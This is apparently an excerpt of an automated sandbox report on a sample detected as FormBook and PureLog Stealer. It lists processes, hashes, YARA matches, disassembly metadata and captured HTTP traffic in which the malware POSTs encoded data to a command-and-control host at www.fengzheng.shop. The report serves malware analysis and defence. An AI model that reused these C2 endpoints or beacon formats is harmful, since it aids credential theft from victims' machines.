                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 47 2b 6a 4a 6f 2f 66 30 6a 43 39 78 6e 52 54 4e 78 55 71 73 52 76 72 65 59 46 2b 63 4b 36 4e 65 74 31 62 6e 4a 78 37 71 79 56 44 78 61 55 77 75 30 38 2b 6c 55 76 38 43 39 49 65 41 6b 2b 66 4b 75 62 4f 4d 69 36 4d 68 39 77 44 76 50 75 79 4d 42 30 57 56 41 2f 42 64 30 6f 4f 79 39 43 55 59 30 45 30 73 47 54 47 33 56 50 42 75 4a 65 54 63 66 7a 52 6d 48 38 30 64 75 6d 36 59 50 66 4a 36 6c 58 47 6b 49 34 37 45 2f 53 64 47 35 32 61 42 7a 6c 34 45 4d 43 75 36 4d 54 78 73 32 4d 39 70 47 55 74 69 76 38 4f 6d 57 72 5a 64 70 75 35 48 6d 30
                                                                                Data Ascii: ynlT=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbG+jJo/f0jC9xnRTNxUqsRvreYF+cK6Net1bnJx7qyVDxaUwu08+lUv8C9IeAk+fKubOMi6Mh9wDvPuyMB0WVA/Bd0oOy9CUY0E0sGTG3VPBuJeTcfzRmH80dum6YPfJ6lXGkI47E/SdG52aBzl4EMCu6MTxs2M9pGUtiv8OmWrZdpu5Hm0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.849760185.26.237.170806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:55.242955923 CET1750OUTPOST /plc2/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.fengzheng.shop
                                                                                Referer: http://www.fengzheng.shop/plc2/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 68 68 68 6f 66 38 4f 42 58 54 6e 66 74 6e 68 64 63 48 30 47 2b 77 68 54 43 4d 6f 4a 57 6f 4d 47 7a 74 49 44 36 6e 4f 4c 55 62 4f 2b 6a 62 67 2f 4e 46 6a 43 2b 78 6e 52 61 74 78 52 71 73 52 49 72 65 42 4d 2b 63 47 45 4e 63 46 31 4b 30 42 78 79 34 61 56 4e 42 61 55 2f 4f 30 39 68 31 55 6d 38 43 73 42 65 41 30 2b 66 4b 75 62 4f 4e 79 36 62 6a 46 77 4d 50 50 70 69 63 41 67 63 31 41 48 42 64 73 53 4f 7a 4a 38 56 73 41 45 31 4d 57 54 4a 6b 39 50 49 75 4a 59 53 63 66 52 52 6d 4c 33 30 64 79 41 36 5a 36 4b 4a 39 52 58 47 46 6c 64 6d 55 72 45 4c 32 64 34 56 53 2f 30 35 6d 31 6a 6e 34 63 56 32 2b 4b 38 32 2b 71 70 75 53 6a 78 44 42 44 76 4e 4c 31 4f 34 77 48 34 44 4d 43 6a 5a 78 58 6b 59 38 75 46 59 48 6c 71 43 34 31 69 67 68 36 62 77 6d 65 2f 5a 30 74 65 4d 6a 4c 50 56 4c 45 62 62 4e 7a 70 56 56 33 45 38 6a 53 65 6a 67 2f 33 75 30 50 53 68 4b 32 35 4c 72 69 4b 61 74 48 4c 38 4c 74 77 4b 6b 7a 48 41 44 71 55 68 32 32 4e 4d 69 4a 65 51 7a 54 69 73 5a 71 58 30 46 2f 4a 41 36 57 55 65 31 61 74 6a [TRUNCATED]
                                                                                Data Ascii: ynlT=hhhof8OBXTnftnhdcH0G+whTCMoJWoMGztID6nOLUbO+jbg/NFjC+xnRatxRqsRIreBM+cGENcF1K0Bxy4aVNBaU/O09h1Um8CsBeA0+fKubONy6bjFwMPPpicAgc1AHBdsSOzJ8VsAE1MWTJk9PIuJYScfRRmL30dyA6Z6KJ9RXGFldmUrEL2d4VS/05m1jn4cV2+K82+qpuSjxDBDvNL1O4wH4DMCjZxXkY8uFYHlqC41igh6bwme/Z0teMjLPVLEbbNzpVV3E8jSejg/3u0PShK25LriKatHL8LtwKkzHADqUh22NMiJeQzTisZqX0F/JA6WUe1atjYZ4PavMhXgBx2L3V/S766sMhGuUg3pB4yX5pLqIfc9Hlgfgk0bPwdvjj1m4S9zQLCrqIaCJhkAfA5sCrw7hlz18Q9tzvI2qRzFwSYePoBavO74XraTRW4ylA2ENBwvOyw3N3AzhzTn6OZ3/uporqj16CyjPLavN7VpjZsx+tQCO356+5m6fQ5qq00VbHGLRck1yxOm0YE+Lqa3tZ92ikwwGQ2L9gbIJmMOl2O8Eqw3HYjrtxf5t8yaKOsOxmIvtr8cnrrNtJIO5e8TBIdbLCt2tVNToKLc1eF+cKz7oqRuoMFuKjFJVocOUul2uiIVKmCTtjXs7htVSg/sYqWNTd6ccVc3/mpINsesKLixjhTrdA3NujBR8tOMkwq2vFP9H/amvJdGDs7mwSvAOwZbW86gYuNBnbQTYGhJ1b3O6gx5rqMMuLlvhVjv0wTZuvyjAh2c53cuUI5y1ov2KBKyex+7SimVfYflfdVJM87MMYv8kPza/Cb/Fih0Xl4cMVz9iVPUhIUVxE4Yh2xFZ6k9T6Z5ZJ78MtbOUAwueMRVoCcKbJIcFslbghO4t3XM/VZCYSb/EBODRYVSZESoOIXvJrGj9awFWibpjyBnMEOVThh/J5F0+oMgajwz7qTmluSJSd4pO4vfyUu8ijSeUwRO8OrFmElc02V9Zi9U [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.849761185.26.237.170806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:57.903362036 CET454OUTGET /plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.fengzheng.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:03:27:02
                                                                                Start date:26/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0xa50000
                                                                                File size:774'656 bytes
                                                                                MD5 hash:09E5C83FA32B0BB661143784179329A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:03:27:04
                                                                                Start date:26/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x450000
                                                                                File size:774'656 bytes
                                                                                MD5 hash:09E5C83FA32B0BB661143784179329A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:03:27:12
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe"
                                                                                Imagebase:0x290000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:5
                                                                                Start time:03:27:14
                                                                                Start date:26/11/2024
                                                                                Path:C:\Windows\SysWOW64\find.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\find.exe"
                                                                                Imagebase:0xed0000
                                                                                File size:14'848 bytes
                                                                                MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:03:27:27
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe"
                                                                                Imagebase:0x290000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:9
                                                                                Start time:03:27:41
                                                                                Start date:26/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff6d20e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:13.6%
                                                                                  Total number of Nodes:59
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 27629 7322c01 CloseHandle 27630 7322c6f 27629->27630 27595 146d2e0 27596 146d326 27595->27596 27600 146d4c0 27596->27600 27603 146d4b0 27596->27603 27597 146d413 27606 146af34 27600->27606 27604 146d4ee 27603->27604 27605 146af34 DuplicateHandle 27603->27605 27604->27597 27605->27604 27607 146d528 DuplicateHandle 27606->27607 27608 146d4ee 27607->27608 27608->27597 27631 146af50 27632 146af5f 27631->27632 27634 146b048 27631->27634 27635 146b059 27634->27635 27636 146b07c 27634->27636 27635->27636 27637 146b280 GetModuleHandleW 27635->27637 27636->27632 27638 146b2ad 27637->27638 27638->27632 27639 7320368 27641 73203a2 27639->27641 27640 7320433 27641->27640 27645 7320452 27641->27645 27650 7320460 27641->27650 27642 7320429 27646 73208e5 27645->27646 27647 732048e 27645->27647 27646->27642 27647->27646 27655 7320d78 27647->27655 27662 7320d88 27647->27662 27651 732048e 27650->27651 27652 73208e5 27650->27652 27651->27652 27653 7320d78 2 API calls 27651->27653 27654 7320d88 2 API calls 27651->27654 27652->27642 27653->27652 27654->27652 27660 7320d78 CreateIconFromResourceEx 27655->27660 27661 7320d88 CreateIconFromResourceEx 27655->27661 27656 7320da2 27657 7320daf 27656->27657 27658 7320dc7 CreateIconFromResourceEx 27656->27658 27657->27646 27659 7320e56 27658->27659 27659->27646 27660->27656 27661->27656 27663 7320da2 27662->27663 27667 7320d78 CreateIconFromResourceEx 27662->27667 27668 7320d88 CreateIconFromResourceEx 27662->27668 27664 7320daf 27663->27664 27665 7320dc7 CreateIconFromResourceEx 27663->27665 27664->27646 27666 7320e56 27665->27666 27666->27646 27667->27663 27668->27663 27609 1464668 27610 1464672 27609->27610 27612 1464758 27609->27612 27613 146477d 27612->27613 27617 1464868 27613->27617 27621 1464858 27613->27621 27619 146488f 27617->27619 27618 146496c 27618->27618 27619->27618 27625 14644b4 27619->27625 27622 1464868 27621->27622 27623 14644b4 CreateActCtxA 27622->27623 27624 146496c 27622->27624 27623->27624 27626 14658f8 CreateActCtxA 27625->27626 27628 14659bb 27626->27628

                                                                                  Executed Functions

                                                                                  Function 0732BAC8 Relevance: 3.5, Strings: 2, Instructions: 1022COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 732bac8-732bae9 1 732baf0-732bbdc 0->1 2 732baeb 0->2 4 732bbe2-732bd33 1->4 5 732c404-732c42c 1->5 2->1 49 732c3d2-732c402 4->49 50 732bd39-732bd94 4->50 8 732cb09-732cb12 5->8 10 732c43a-732c443 8->10 11 732cb18-732cb2f 8->11 13 732c445 10->13 14 732c44a-732c52b 10->14 13->14 30 732c531-732c53e 14->30 31 732c540-732c54c 30->31 32 732c568 30->32 34 732c556-732c55c 31->34 35 732c54e-732c554 31->35 36 732c56e-732c58e 32->36 37 732c566 34->37 35->37 41 732c590-732c5e9 36->41 42 732c5ee-732c664 36->42 37->36 53 732cb06 41->53 61 732c666-732c6b7 42->61 62 732c6b9-732c6fc call 732b670 42->62 49->5 58 732bd96 50->58 59 732bd99-732bda4 50->59 53->8 58->59 60 732c2e8-732c2ee 59->60 63 732c2f4-732c371 60->63 64 732bda9-732bdc7 60->64 90 732c707-732c70d 61->90 62->90 107 732c3be-732c3c4 63->107 66 732bdc9-732bdcd 64->66 67 732be1e-732be33 64->67 66->67 71 732bdcf-732bdda 66->71 74 732be35 67->74 75 732be3a-732be50 67->75 78 732be10-732be16 71->78 74->75 76 732be52 75->76 77 732be57-732be6e 75->77 76->77 81 732be70 77->81 82 732be75-732be8b 77->82 84 732be18-732be19 78->84 85 732bddc-732bde0 78->85 81->82 88 732be92-732be99 82->88 89 732be8d 82->89 91 732be9c-732bf0d 84->91 86 732bde2 85->86 87 732bde6-732bdfe 85->87 86->87 93 732be00 87->93 94 732be05-732be0d 87->94 88->91 89->88 96 732c764-732c770 90->96 97 732bf23-732c09b 91->97 98 732bf0f 91->98 93->94 94->78 99 732c772-732c7fa 96->99 100 732c70f-732c731 96->100 108 732c0b1-732c1ec 97->108 109 732c09d 97->109 98->97 101 732bf11-732bf1d 98->101 130 732c97b-732c984 99->130 102 732c733 100->102 103 732c738-732c761 100->103 101->97 102->103 103->96 111 732c373-732c3bb 107->111 112 732c3c6 107->112 120 732c250-732c265 108->120 121 732c1ee-732c1f2 108->121 109->108 110 732c09f-732c0ab 109->110 110->108 111->107 112->49 123 732c267 120->123 124 732c26c-732c28d 120->124 121->120 125 732c1f4-732c203 121->125 123->124 127 732c294-732c2b3 124->127 128 732c28f 124->128 129 732c242-732c248 125->129 134 732c2b5 127->134 135 732c2ba-732c2da 127->135 128->127 136 732c205-732c209 129->136 137 732c24a-732c24b 129->137 132 732c98a-732c9e5 130->132 133 732c7ff-732c814 130->133 159 732c9e7-732ca1a 132->159 160 732ca1c-732ca46 132->160 141 732c816 133->141 142 732c81d-732c969 133->142 134->135 143 732c2e1 135->143 144 732c2dc 135->144 139 732c213-732c234 136->139 140 732c20b-732c20f 136->140 138 732c2e5 137->138 138->60 146 732c236 139->146 147 732c23b-732c23f 139->147 140->139 141->142 148 732c823-732c861 141->148 149 732c8f0-732c930 141->149 150 732c866-732c8a6 141->150 151 732c8ab-732c8eb 141->151 162 732c975 142->162 143->138 144->143 146->147 147->129 148->162 149->162 150->162 151->162 168 732ca4f-732caff 159->168 160->168 162->130 168->53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $<ov!
                                                                                  • API String ID: 0-3807132934
                                                                                  • Opcode ID: d63e66e5021e8332a4e880e1204973c897de4e3c8f37ff3b9e0c28b54eaf1481
                                                                                  • Instruction ID: bdb749ca2ab10005eb168ff31a6fee3740f1238a7ac52093409c25f27d42a7cb
                                                                                  • Opcode Fuzzy Hash: d63e66e5021e8332a4e880e1204973c897de4e3c8f37ff3b9e0c28b54eaf1481
                                                                                  • Instruction Fuzzy Hash: D8B2C4B4900228CFDB65DF69C984AD9BBB2FF89300F1581E9D50DAB225DB319E81DF50
                                                                                  Function 073280E8 Relevance: 2.6, Instructions: 2603COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7655cc2313d95f2f9f139baec4901261fe354c027697ab4fdfec42e9c05cdf06
                                                                                  • Instruction ID: e9bdaef7e6f9a866f34d5bd9c6d49b3c4c7827e61d598d52172a64576af1ff16
                                                                                  • Opcode Fuzzy Hash: 7655cc2313d95f2f9f139baec4901261fe354c027697ab4fdfec42e9c05cdf06
                                                                                  • Instruction Fuzzy Hash: 7443DFB4A00229CFDB24DF69C888A9DB7B2BF49310F1581D5D949AB361DB31ED82DF50
                                                                                  Function 073270A0 Relevance: .7, Instructions: 719COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6105b5d1cf8b45f55865dd66f1de400c23dfebbb607713684bf08409c3943a1e
                                                                                  • Instruction ID: 6b0a4479076636f771a4546043355305c1f44391820501b4cca9eb3eb1a5b65a
                                                                                  • Opcode Fuzzy Hash: 6105b5d1cf8b45f55865dd66f1de400c23dfebbb607713684bf08409c3943a1e
                                                                                  • Instruction Fuzzy Hash: 475252B5A00226DFEB14DF79C484A6D7BB2BF89710F158169E919DB360DB31EC02DB90
                                                                                  Function 07320460 Relevance: .6, Instructions: 615COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1664 7320460-7320488 1665 732096b-73209d4 1664->1665 1666 732048e-7320493 1664->1666 1673 73209db-7320a63 1665->1673 1666->1665 1667 7320499-73204b6 1666->1667 1667->1673 1674 73204bc-73204c0 1667->1674 1711 7320a6e-7320aee 1673->1711 1675 73204c2-73204cc 1674->1675 1676 73204cf-73204d3 1674->1676 1675->1676 1678 73204e2-73204e9 1676->1678 1679 73204d5-73204df 1676->1679 1682 7320604-7320609 1678->1682 1683 73204ef-732051f 1678->1683 1679->1678 1687 7320611-7320616 1682->1687 1688 732060b-732060f 1682->1688 1692 7320525-73205f8 1683->1692 1693 7320cee-7320d14 1683->1693 1691 7320628-7320658 1687->1691 1688->1687 1690 7320618-732061c 1688->1690 1690->1693 1696 7320622-7320625 1690->1696 1691->1711 1712 732065e-7320661 1691->1712 1692->1682 1719 73205fa 1692->1719 1702 7320d16-7320d22 1693->1702 1703 7320d24 1693->1703 1696->1691 1706 7320d27-7320d2c 1702->1706 1703->1706 1726 7320af5-7320b77 1711->1726 1712->1711 1714 7320667-7320669 1712->1714 1714->1711 1717 732066f-73206a4 1714->1717 1717->1726 1727 73206aa-73206b3 1717->1727 1719->1682 1733 7320b7f-7320c01 1726->1733 1729 7320816-732081a 1727->1729 1730 73206b9-7320713 1727->1730 1732 7320820-7320824 1729->1732 1729->1733 1770 7320725 1730->1770 1771 7320715-732071e 1730->1771 1736 732082a-7320830 1732->1736 1737 7320c09-7320c36 1732->1737 1733->1737 1740 7320832 1736->1740 1741 7320834-7320869 1736->1741 1748 7320c3d-7320cbd 1737->1748 1742 7320870-7320876 1740->1742 1741->1742 1747 732087c-7320884 1742->1747 1742->1748 1753 7320886-732088a 1747->1753 1754 732088b-732088d 1747->1754 1803 7320cc4-7320ce6 1748->1803 1753->1754 1759 73208ef-73208f5 1754->1759 1760 732088f-73208b3 1754->1760 1765 73208f7-7320912 1759->1765 1766 7320914-7320942 1759->1766 1788 73208b5-73208ba 1760->1788 1789 73208bc-73208c0 1760->1789 1786 732094a-7320956 1765->1786 1766->1786 1776 7320729-732072b 1770->1776 1775 7320720-7320723 1771->1775 1771->1776 1775->1776 1784 7320732-7320736 1776->1784 1785 732072d 1776->1785 1790 7320744-732074a 1784->1790 1791 7320738-732073f 1784->1791 1785->1784 1786->1803 1804 732095c-7320968 1786->1804 1795 73208cc-73208dd 1788->1795 1789->1693 1796 73208c6-73208c9 1789->1796 1792 7320754-7320759 1790->1792 1793 732074c-7320752 1790->1793 1800 73207e1-73207e5 1791->1800 1801 732075f-7320765 1792->1801 1793->1801 1840 73208df call 7320d78 1795->1840 1841 73208df call 7320d88 1795->1841 1796->1795 1805 73207e7-7320801 1800->1805 1806 7320804-7320810 1800->1806 1808 7320767-7320769 1801->1808 1809 732076b-7320770 1801->1809 1803->1693 1805->1806 1806->1729 1806->1730 1815 7320772-7320784 1808->1815 1809->1815 1812 73208e5-73208ed 1812->1786 1821 7320786-732078c 1815->1821 1822 732078e-7320793 1815->1822 1823 7320799-73207a0 1821->1823 1822->1823 1828 73207a2-73207a4 1823->1828 1829 73207a6 1823->1829 1830 73207ab-73207b6 1828->1830 1829->1830 1832 73207da 1830->1832 1833 73207b8-73207bb 1830->1833 1832->1800 1833->1800 1835 73207bd-73207c3 1833->1835 1836 73207c5-73207c8 1835->1836 1837 73207ca-73207d3 1835->1837 1836->1832 1836->1837 1837->1800 1839 73207d5-73207d8 1837->1839 1839->1800 1839->1832 1840->1812 1841->1812
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3715a6d6b4a36d98fec02d08ddae18b414d6787814377148ff4300ab0f2c43c
                                                                                  • Instruction ID: 6fa6c720a7c351ec4e336704045fe3cfb0b17af78e63dc72480372163def62fd
                                                                                  • Opcode Fuzzy Hash: d3715a6d6b4a36d98fec02d08ddae18b414d6787814377148ff4300ab0f2c43c
                                                                                  • Instruction Fuzzy Hash: 39325270E102288FEB58DFA9C45479EBBF2BF88300F14816AD449AB395DB349D46DF91
                                                                                  Function 07320452 Relevance: .3, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1420559512.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dff37674be419bd55a975571cdba4742549a969d27c75ce900fded277122ccf8
                                                                                  • Instruction ID: bdf283612a58daf12ed17972c4b3fb86a2e3816af6e5c75926575015e96caf92
                                                                                  • Opcode Fuzzy Hash: dff37674be419bd55a975571cdba4742549a969d27c75ce900fded277122ccf8
                                                                                  • Instruction Fuzzy Hash: FDC14EB1E00269CFEF29DF65C98479DBBB2AF88300F14C169D449AB255EB30D989DF50
                                                                                  Function 0146B048 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 943 146b048-146b057 944 146b083-146b087 943->944 945 146b059-146b066 call 1469ab8 943->945 946 146b09b-146b0dc 944->946 947 146b089-146b093 944->947 952 146b07c 945->952 953 146b068 945->953 954 146b0de-146b0e6 946->954 955 146b0e9-146b0f7 946->955 947->946 952->944 998 146b06e call 146b2d0 953->998 999 146b06e call 146b2e0 953->999 954->955 957 146b11b-146b11d 955->957 958 146b0f9-146b0fe 955->958 956 146b074-146b076 956->952 959 146b1b8-146b278 956->959 960 146b120-146b127 957->960 961 146b100-146b107 call 146ad00 958->961 962 146b109 958->962 993 146b280-146b2ab GetModuleHandleW 959->993 994 146b27a-146b27d 959->994 964 146b134-146b13b 960->964 965 146b129-146b131 960->965 963 146b10b-146b119 961->963 962->963 963->960 967 146b13d-146b145 964->967 968 146b148-146b151 call 146ad10 964->968 965->964 967->968 974 146b153-146b15b 968->974 975 146b15e-146b163 968->975 974->975 976 146b165-146b16c 975->976 977 146b181-146b185 975->977 976->977 979 146b16e-146b17e call 146ad20 call 146ad30 976->979 1000 146b188 call 146b5e0 977->1000 1001 146b188 call 146b5b0 977->1001 979->977 980 146b18b-146b18e 983 146b190-146b1ae 980->983 984 146b1b1-146b1b7 980->984 983->984 995 146b2b4-146b2c8 993->995 996 146b2ad-146b2b3 993->996 994->993 996->995 998->956 999->956 1000->980 1001->980
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0146B29E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1415921557.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1460000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 58fe97cdeabc74f7d2e8c8eb94ea57978cfd74378c0b2b48b2207aebd5862cca
                                                                                  • Instruction ID: 6e3054a93c871a347eda9c980455b9a6482e8b7cbca01ff234860415c845e1df
                                                                                  • Opcode Fuzzy Hash: 58fe97cdeabc74f7d2e8c8eb94ea57978cfd74378c0b2b48b2207aebd5862cca
                                                                                  • Instruction Fuzzy Hash: 30712470A00B059FDB24DF2AD45479BBBF5FF88248F00892ED58AD7B60DB75E8058B91
                                                                                  Function 014644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

